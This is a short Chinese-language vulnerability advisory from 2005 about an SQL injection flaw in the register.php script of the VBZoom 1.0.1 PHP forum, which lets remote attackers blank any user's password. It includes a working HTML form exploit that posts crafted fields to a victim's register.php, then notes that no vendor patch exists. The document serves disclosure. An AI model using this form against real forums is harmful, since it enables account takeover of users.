添加时间:
2005-08-14

系统编号:
WAVDB-00254
BUGTRAQ: 5919

影响版本:
VBZoom 1.0.1

程序介绍:

VbZooM是一款由PHP编写的论坛程序。

漏洞分析:

VbZooM中的register.php脚本存在问题，远程攻击者可以利用这个漏洞清空任意用户密码。
VbZooM中的register.php脚本对用户提交的参数缺少正确充分的过滤，远程攻击者提交恶意SQL查询，可以改变原来应用系统中的SQL查询路径，导致清空论坛中任意用户的密码。


漏洞利用:

<form name= f1  action= http://www.victim.com/vbzoom/register.php  method= POST > 
<input type= hidden  name= ChangeProfile  value= 1 > 
User Name: <input type= text  name= UserName >
Password: <input type= text  name= Password >
 mail: <input type= text  name= Email > 
<input type= hidden  name= HomePage  value= lamerZ > 
<input type= hidden  name= VBZooMForumCookiesUserName  value= false > 
<input type= hidden  name= VBZooMForumCookiesUserName  value= false > 
<input type= submit  value= reset password > 
</form> 

解决方案:
厂商补丁：
VBZoom
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.vbzoom.com

信息来源:
<*来源：hish _ hish （hish_hish565@hotmail.com）
链接：http://marc.theaimsgroup.com/?l=bugtraq&m=103411110618770&w=2
*>